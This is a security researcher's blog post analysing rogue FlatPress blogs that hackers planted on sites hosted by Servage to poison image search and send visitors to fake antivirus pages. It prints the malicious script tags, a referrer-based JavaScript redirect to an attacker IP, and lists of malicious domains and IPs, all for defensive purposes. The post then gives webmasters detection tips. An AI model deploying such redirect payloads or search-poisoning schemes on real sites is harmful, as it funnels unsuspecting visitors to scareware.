msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

More About the Rogue Image Blogs on Servage Network…

   04 May 10   Filed in Website exploits

This is the fifth article in the series about rogue blogs created by hackers inside legitimate websites of Servage clients. Millions of malicious web pages has seriously poisoned Google search results, redirecting visitors to scareware sites. You might want to read the previous posts first:

In this post, I’ll describe how the new generation of rogue blogs works.

Some history

Hackers exploited some security hole of the Servage hosting provider and created rogue blogs deep in the directory structure of thousands legitimate websites of Servage clients. Depending on the generation of the attack, hackers used the same names for blog subdirectories: blog, bmblog, bsblog, bmsblog, mdblog.

Examples:

example.com/proofs/tpl/mdblog
example.org/img/images/bmblog
example.net/gallery/albums/bsblog

However, when security researchers found and described this malicious network of blogs, Google started to actively remove them from their index. For example, the allinurl:bmblog/category search returned almost 300,000 results in November and today it only returns 6 results.

In November of 2009, cybercrooks began to unroll the new type of spammy blogs that will be described here.

Hotlinking and keyword stuffing

The blog posts hotlink 6-10 high-ranking images for a targeted query.  The images are interspersed with short word combinations that contain the targeted keyword. Each word combination is wrapped in different HTML tags (supposedly, to make the keyword stuffing less obvious). Here is a short snippet of HTML for a page that target word combinations with “Houston”:

...<p><img src="http://somesite.com/Detoxy_Foot_pads/detox_foot_pads_box.jpg" alt="houston tx band trade shows"/></p>
<p><b>Private Schools Houston</b>. <u>Ariel Photo Houston</u>. <u>Wedding Photography Houston Texas</u>. Houston Gun Shows.</p>
<p><img src="http://anothersite.com/myspace/ricksnycann_back.jpg" alt="houston texans cheerleaders"/></p>
<ul>
<li>Houston Movie Theatres</li>
<li><b>Hard Rock Cafe Houston</b></li>
<li><u>Wife Swapping Houston</u></li>
</ul>...

Apparently, this trick works. Somehow, these crappy blogs with zero original content and no inbound links make it into the first pages of Google image search results, prevail there (sometimes, up to 100% positions) crowding out previously high-ranking sites with the original content.  (@Google: I hope you are already working on the Image search update that addresses this issue.)

FlatPress blogging engine

In this generation of the attack, they changed the blogging engine. The new blogs are powered by FlatPress 0.909.

Here’s the description of this engine that I found on its site:

FlatPress is an open-source standard-compliant multi-lingual extensible blogging engine which does not require a DataBase Management System to work.
You don’t need MySQL because FlatPress stores all of its content on text files.
All you need is some web space supporting PHP4 (or later).

  • Standard-compliant (XHTML valid)
  • Plugin support
  • Widget system
  • Easy to customize with themes (powered by Smarty)

This is a more powerful and flexible engine that (as the previous engine) doesn’t require database and thus is very easy to configure and can be installed on almost any hosting with PHP support. At the same time it supports SEO-friendly URLs (pretty urls) and custom themes, that make different blogs look different (and less suspicious).

URL structure

These new blogs are installed the first level subdirectories of legitimate sites. The names of the subdirectories consists of some word (usually a human name) and some 4-5 digit number (this number seems to be unique throughout all the rogue blogs).

example.com/sarah5689/
example.net/learn2463/
example.org/gulf4645/

Sometimes there may be more that one rogue blog installed into different subdirectories of the same site.

Since the blogs are powered by FlatPress, they all have FlatPress specific URL structure, which made it easy to come up with allinurl: Google searches that helped reveal thousands of such malicious blogs.

Individual posts have the following URL structure:

/?x=entry:entryYYMMDD-HHMMSS, where YYMMDD-HHMMSS is the date and the time of the post.

for example: /after6031/?x=entry:entry100405-151819 – this post was published on April 5, 2010 at 15:18.

The blogs also have archive pages, that list all posts (4-5 posts per page) for specified periods. They have the following URL structure:

/?x=y:YY;m:MM – archive of posts published in MM month of YY year.

for example:

/?x=y:09;m:12 – archive of posts published in December of 2009
/?x=y:10;m:04 – archive of posts published in April of 2010

To access some particular archive page, we add the &paged parameter

/?x=y:10;m:04&paged=2 – the second page of the archive of posts published in April of 2010

Redirects to Fake AV sites

Each blog page (except for “login” pages) contains a block of HTML code with malicious scripts (this time it is not even hidden from search engine bots)

<!-- HippoCounter -->
<script type="text/javascript">
var kc_id = '32';
</script>
<script type="text/javascript" src="hxxp://hippocounter .info/counter/counter.js"></script>
<!-- HippoCounter -->
<script type="text/javascript" src="hxxp://adstatsviewer .in/counter.js?ad=1"></script>

The first one (hippocounter) seems to be a real statistics script. However it’s a hackers’ own statistics on their own server. It has an alternative domain name hippocounter .com that was created on January 11, 20100. But when Google had blacklisted the .com domain hackers’ registered the .info domain (March 3, 2010) and used it since then. Both domains point at the same site on server with IP 96 .9 .177 .21 (Pennsylvania – Scranton – Network Operations Center Inc).

The second script from the .in domain is the one that actually redirects visitors to scareware sites.

if (document.referrer.length > 0) {top.location.href='http://91.188.59.166/main.php?land=20&affid=95200'}

Latvian AS6851 (BKCNET) network

The IP address in the malicious URL changes almost every day: 91.188.59.167, 91.188.60.63, 91.188.60.63, 91.188.60.65, 91.188.60.69 etc. but they all belong to the AS6851 (BKCNET) network. This network is a known source of multiple malware attacks: malwareUrl report, Google’s Safe Browsing report.

This network is identified as Latvia Riga Docsis Ip Pool For Cable Customers. This means that most likely the IPs belong to regular users of a cable Internet Service Provider in Latvia. Moreover, the IPs are dynamically assigned from a pool of available IPs – that’s probably why hackers change them in the redirection script.

I wonder what prevents the police to catch the hackers? With cable ISPs, the physical location of the client IPs should be easily traceable. Or am I too naive?

Malicious .in domains

Let’s get back to that malicious external script found in the rogue blogs. To prevent blacklisting, hackers register new domains almost every day. They are all .in domains and they point to 5 servers on the AS47869 (NETROUTING – Netherlands) network.

94.228.220.93:
dahaloho .in, kanakaba .in, hachapurnja .in, lahhangar .in, emonabin .in,
opnalona .in, gamrin .in, loomoom .in, galorobap .in, oppp .in, polofogoma .in,
jajabin .in
94.228.220.95:
ownfoxdomains.in
94.228.209.133
newstatsgate .in, ownsitecounter .in, gettruecount .in, ownfreestats .in,
celebsfinectpics .in, getstatsview .in
94.228.209.134
ownviewpoint .in, ownuniqchecker .in, getpiccount .in, checkpicstats .in,
getuniqinfo .in, checkvisits .in, owncheckuniq .in
94.228.209.136
adstatsviewer .in, newpeoplecheck .in, adinfoblock .in, getcounters .in,
adchecker .in, getfreestats .in, blogpics3 .in, newpicstats .in, getuniqchecker .in,
ownlaststats .in

Among them, there are two specialized domains: celebsfinectpics .in is used exclusively in celebsfinectpics.com sites (also 94.228.209.133) and blogpics3 .in is used in the malicious Blogger blogs.

Google Tips

When hackers create rogue content on your site in order to poison search engine results, you can use search engine to discover such a content.

1. Try the site: command on Google. It will display all indexed pages on your site (e.g. site:example.com – replace example.com with your own site’s domain name). If your site is relatively small and you can browse through all the search results, you’ll be able to find links to rogue web pages if Google has indexed them.

1.1. If you are a Servage client, you can use the following command to check your site for the rogue blogs described in this article: site:example.com inurl:entry (again, replace example.com with your site’s domain name)

2. Regularly check the following sections of Google Webmaster Tools: Top search queries, Keywods and Internal links – you might spot irrelevant keywords and fishy links there.

To webmasters

As you can see, if you don’t look properly after you site, don’t be surprised if you eventually find it actively abused by hackers and blacklisted by Google. And this situation with Servage shows that your hosting service provider will not look after your sites either. Moreover, some hosting providers may have serious security issues that allow hackers mess with their clients’ sites for months and years.

If your website is happened to be on a shared server, you should be prepared to deal with all sorts of security problems yourself. The key factors are regular monitoring and reliable backup/restore strategy. This way you will be able to detect problems before they incur serious damage and easily recover your site to the most recent clean state. A clever backup/restore strategy will also help you seamlessly move to another hosting provider if you find that your current provider can’t guarantee secure shared hosting environment.

Time to act

As a security researcher, I’m trying to unearth facts that can help all involved parties (webmasters, Servage, Google) mitigate the effects of hacker attacks. I believe, that such posts can make a difference.

I hope that after reading this posts:

  • webmasters will check their sites to make sure they are not affected
  • hosting providers will try to find out whether they have similar issues on their servers or not
  • and guys from Google will try to make it harder to poison their search results, etc.

What do you think?

Related posts:

Reader's Comments (2)

  1. |

    Thanks for the infos about the Rogue Blogs.
    I was just cleaning up my old servage account before I cancel it and stumbled upon a lot of these blogs.
    This isn’t the first time I had problems with servage. My password isn’t the problem since I use random passwords like wait9ldd3aif4nej2eat7tia6 and servge never informed me of any security holes they might have had and that I should clean up my account. After the first months of servage I already started having problems but kept the account as backup but then servage started deleting my backupfiles (they did notify me about that).
    Anyway, servage really is a waste of money (although they are cheap)

  2. |

    Hi!

    Thank you for the information about these rogue blogs. I’m also a Servage customer, and some of my sites were also infected with these blogs.

    I did some research, and found the script/method they use to infect your site with these anoying blogs.

    If you are interested in what I’ve found, I’ll send you the details together with the script. In short, all the blogs come from hippocounter.info :(

    regards!